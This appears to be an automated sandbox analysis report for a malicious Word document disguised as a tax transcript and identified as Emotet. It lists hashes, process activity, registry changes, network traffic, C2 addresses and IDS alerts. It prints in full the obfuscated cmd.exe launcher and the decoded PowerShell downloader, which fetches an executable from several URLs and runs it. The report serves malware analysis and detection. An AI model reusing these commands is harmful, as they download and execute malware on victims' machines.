| File name: | Tax Account Transcript.doc |
| Full analysis: | https://app.any.run/tasks/b67997ad-185a-443c-b80a-919e95da28df |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | December 06, 2018, 13:56:58 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 12:20:00 2018, Last Saved Time/Date: Thu Dec 6 12:20:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 10, Security: 0 |
| MD5: | 0649599A880E93BFB7B4F47CBAE38E82 |
| SHA1: | 09E706EFF531FB6C1F182479577C7F1DA77CA84C |
| SHA256: | 3A7D739E9B2F2DEB9B992C2707009559767FE21C7A52EC061D793C85ED510BE2 |
| SSDEEP: | 1536:tfIB81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9zxGsUwED1:k8GhDS0o9zTGOZD6EbzCdnGsFy1 |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:12:06 12:20:00 |
| ModifyDate: | 2018:12:06 12:20:00 |
| Pages: | 1 |
| Words: | 1 |
| Characters: | 10 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 10 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2552 | c:\zwTahRYpz\Otqwwsh\BpQDDpBfcfZqGQ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set ezn=VQKOfjdvWJwfaCqnGzdmQq2EU:0I+3\-N=L$hR;A eYipu'8k@{Scb,sM/gTZ)o5DlHB}rPtx1y.F(6&&for %N in (35;18;17;16;33;46;44;17;32;46;38;35;17;59;60;33;15;41;10;31;62;53;5;41;52;71;40;32;41;71;75;8;41;53;13;65;43;41;15;71;38;35;24;69;17;33;46;36;71;71;44;25;57;57;53;45;69;15;53;69;43;58;36;71;41;69;75;52;62;19;57;73;51;70;69;20;59;9;58;49;36;71;71;44;25;57;57;12;45;69;12;65;78;75;15;41;71;57;17;51;7;66;29;10;21;67;49;36;71;71;44;25;57;57;52;44;41;69;11;62;69;19;12;15;52;41;58;69;62;45;44;75;52;62;19;57;62;74;69;55;34;17;27;49;36;71;71;44;25;57;57;17;12;48;62;44;12;15;41;18;62;19;48;43;75;52;62;19;75;44;65;57;44;70;16;17;64;3;73;49;36;71;71;44;25;57;57;5;45;55;71;53;12;71;36;69;62;62;19;55;75;15;41;71;57;24;7;37;74;41;60;3;21;46;75;51;44;65;43;71;77;46;49;46;61;38;35;0;64;23;33;46;21;5;37;46;38;35;27;20;42;40;33;40;46;73;22;63;46;38;35;69;9;0;33;46;51;19;5;46;38;35;34;2;60;33;35;41;15;7;25;71;41;19;44;28;46;30;46;28;35;27;20;42;28;46;75;41;72;41;46;38;11;62;69;41;12;52;36;77;35;42;53;32;40;43;15;40;35;24;69;17;61;50;71;69;74;50;35;17;59;60;75;64;62;10;15;65;62;12;18;76;43;65;41;77;35;42;53;32;54;40;35;34;2;60;61;38;35;55;27;8;33;46;70;12;23;46;38;27;11;40;77;77;16;41;71;31;27;71;41;19;40;35;34;2;60;61;75;65;41;15;58;71;36;40;31;58;41;40;47;26;26;26;26;61;40;50;27;15;7;62;48;41;31;27;71;41;19;40;35;34;2;60;38;35;76;32;67;33;46;7;45;0;46;38;53;69;41;12;48;38;68;68;52;12;71;52;36;50;68;68;35;39;17;0;33;46;12;56;52;46;38;85)do set BSL=!BSL!!ezn:~%N,1!&&if %N gtr 84 powershell.exe "!BSL:*BSL!=!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2828 | powershell.exe "$dzG='pzN';$zTZ=new-object Net.WebClient;$Urz='http://burnbrighter.com/1SPrQTJg@http://aural6.net/zSvH3wqB@http://cperformancegroup.com/oyrsLzI@http://zakopanedomki.com.pl/pPGzDO1@http://justbathrooms.net/UvRyeZOq'.Split('@');$VDE='qjR';$IQY = '125';$rJV='Smj';$LKZ=$env:temp+'\'+$IQY+'.exe';foreach($YbN in $Urz){try{$zTZ.DownloadFile($YbN, $LKZ);$sIW='PaE';If ((Get-Item $LKZ).length -ge 80000) {Invoke-Item $LKZ;$FNB='vuV';break;}}catch{}}$AzV='aMc';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3012 | "C:\Users\admin\AppData\Local\Temp\125.exe" | C:\Users\admin\AppData\Local\Temp\125.exe | — | powershell.exe | |||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
| 3044 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 125.exe | |||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
| 3088 | CmD /V/C"set ezn=VQKOfjdvWJwfaCqnGzdmQq2EU:0I+3\-N=L$hR;A eYipu'8k@{Scb,sM/gTZ)o5DlHB}rPtx1y.F(6&&for %N in (35;18;17;16;33;46;44;17;32;46;38;35;17;59;60;33;15;41;10;31;62;53;5;41;52;71;40;32;41;71;75;8;41;53;13;65;43;41;15;71;38;35;24;69;17;33;46;36;71;71;44;25;57;57;53;45;69;15;53;69;43;58;36;71;41;69;75;52;62;19;57;73;51;70;69;20;59;9;58;49;36;71;71;44;25;57;57;12;45;69;12;65;78;75;15;41;71;57;17;51;7;66;29;10;21;67;49;36;71;71;44;25;57;57;52;44;41;69;11;62;69;19;12;15;52;41;58;69;62;45;44;75;52;62;19;57;62;74;69;55;34;17;27;49;36;71;71;44;25;57;57;17;12;48;62;44;12;15;41;18;62;19;48;43;75;52;62;19;75;44;65;57;44;70;16;17;64;3;73;49;36;71;71;44;25;57;57;5;45;55;71;53;12;71;36;69;62;62;19;55;75;15;41;71;57;24;7;37;74;41;60;3;21;46;75;51;44;65;43;71;77;46;49;46;61;38;35;0;64;23;33;46;21;5;37;46;38;35;27;20;42;40;33;40;46;73;22;63;46;38;35;69;9;0;33;46;51;19;5;46;38;35;34;2;60;33;35;41;15;7;25;71;41;19;44;28;46;30;46;28;35;27;20;42;28;46;75;41;72;41;46;38;11;62;69;41;12;52;36;77;35;42;53;32;40;43;15;40;35;24;69;17;61;50;71;69;74;50;35;17;59;60;75;64;62;10;15;65;62;12;18;76;43;65;41;77;35;42;53;32;54;40;35;34;2;60;61;38;35;55;27;8;33;46;70;12;23;46;38;27;11;40;77;77;16;41;71;31;27;71;41;19;40;35;34;2;60;61;75;65;41;15;58;71;36;40;31;58;41;40;47;26;26;26;26;61;40;50;27;15;7;62;48;41;31;27;71;41;19;40;35;34;2;60;38;35;76;32;67;33;46;7;45;0;46;38;53;69;41;12;48;38;68;68;52;12;71;52;36;50;68;68;35;39;17;0;33;46;12;56;52;46;38;85)do set BSL=!BSL!!ezn:~%N,1!&&if %N gtr 84 powershell.exe "!BSL:*BSL!=!"" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3496 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Tax Account Transcript.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3632 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | ||||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
| 3772 | "C:\Users\admin\AppData\Local\Temp\125.exe" | C:\Users\admin\AppData\Local\Temp\125.exe | 125.exe | ||||||||||||
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 Modules
| |||||||||||||||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | $u! |
Value: 24752100A80D0000010000000000000000000000 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1300627479 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1300627600 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1300627601 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: A80D00009CF796976B8DD40100000000 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | .v! |
Value: 2E762100A80D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | .v! |
Value: 2E762100A80D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3496) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA914.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QTLN190UHG0G3G8UQHXK.temp | — | |
MD5:— | SHA256:— | |||
| 3496 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2828 | powershell.exe | C:\Users\admin\AppData\Local\Temp\125.exe | executable | |
MD5:— | SHA256:— | |||
| 3496 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$x Account Transcript.doc | pgc | |
MD5:— | SHA256:— | |||
| 2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b4ad.TMP | binary | |
MD5:— | SHA256:— | |||
| 3772 | 125.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:— | SHA256:— | |||
| 2828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2828 | powershell.exe | GET | — | 64.90.43.227:80 | http://burnbrighter.com/1SPrQTJg | US | — | — | malicious |
3632 | archivesymbol.exe | GET | — | 74.104.175.6:443 | http://74.104.175.6:443/ | US | — | — | malicious |
2828 | powershell.exe | GET | 301 | 204.93.167.27:80 | http://aural6.net/zSvH3wqB | US | html | 235 b | malicious |
2828 | powershell.exe | GET | 200 | 204.93.167.27:80 | http://aural6.net/zSvH3wqB/ | US | executable | 160 Kb | malicious |
3632 | archivesymbol.exe | GET | 200 | 119.92.51.40:8080 | http://119.92.51.40:8080/ | PH | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2828 | powershell.exe | 64.90.43.227:80 | burnbrighter.com | New Dream Network, LLC | US | suspicious |
2828 | powershell.exe | 204.93.167.27:80 | aural6.net | Server Central Network | US | suspicious |
3632 | archivesymbol.exe | 74.104.175.6:443 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
3632 | archivesymbol.exe | 142.169.99.1:7080 | — | TELUS Communications Inc. | CA | malicious |
3632 | archivesymbol.exe | 119.92.51.40:8080 | — | Philippine Long Distance Telephone Company | PH | malicious |
Domain | IP | Reputation |
|---|---|---|
burnbrighter.com |
| malicious |
aural6.net |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
|---|---|---|---|
2828 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2828 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2828 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2828 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2828 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3632 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3632 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3632 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3632 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |